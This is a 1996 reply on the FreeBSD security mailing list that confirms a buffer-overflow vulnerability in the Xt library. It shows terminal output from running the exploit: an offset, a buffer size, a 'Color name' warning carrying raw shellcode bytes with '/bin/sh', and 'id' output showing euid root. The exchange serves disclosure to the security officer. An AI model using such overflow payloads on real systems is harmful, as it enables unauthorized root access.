Date: Sun, 25 Aug 1996 13:48:21 +0200
From: roberto@keltia.freenix.fr (Ollivier Robert)
To: freebsd-security@FreeBSD.ORG
Cc: security-officer@FreeBSD.ORG
Subject: Re: Vulnerability in the Xt library (fwd)
Message-ID: <199608251148.NAA25686@keltia.freenix.fr>
In-Reply-To: <199608250605.BAA22181@gwydion.hns.st-louis.mo.us>; from Kent Hamilton on Aug 25, 1996 1:05:20 -0500
References: <199608250605.BAA22181@gwydion.hns.st-louis.mo.us>
According to Kent Hamilton:
> Thought this might be of interest.
I confirm that it works like a charm here :-(
357 [13:44] roberto@keltia:~/src/C> ./exploit
Using offset of esp + 0 (efbfd3b0)
Buffer size 1491
Warning: Color name "ë#^^
1ÒVVVV1À°;N
ÊRQSPëèØÿÿÿ/bin/sh´Ó¿ï´Ó¿ïë#^^
1ÒVVVV1À°;N
ÊRQSPëèØÿÿÿ/bin/sh´Ó¿ï´Ó¿H³¿ï!
# id
uid=101(roberto) euid=0(root) gid=10(staff) groups=10(staff), 0(wheel), 2(kmem), 5(operator), 6(man), 8(news), 15(cvs), 20(majordom), 21(list), 100(copains), 117(dialer), 2000(dos), 2001(tex)
I saw the discussion on Bugtraq. There are a lot of fixed buffers in X as I
recall.
--
Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 2.2-CURRENT #18: Sun Aug 18 19:16:52 MET DST 1996
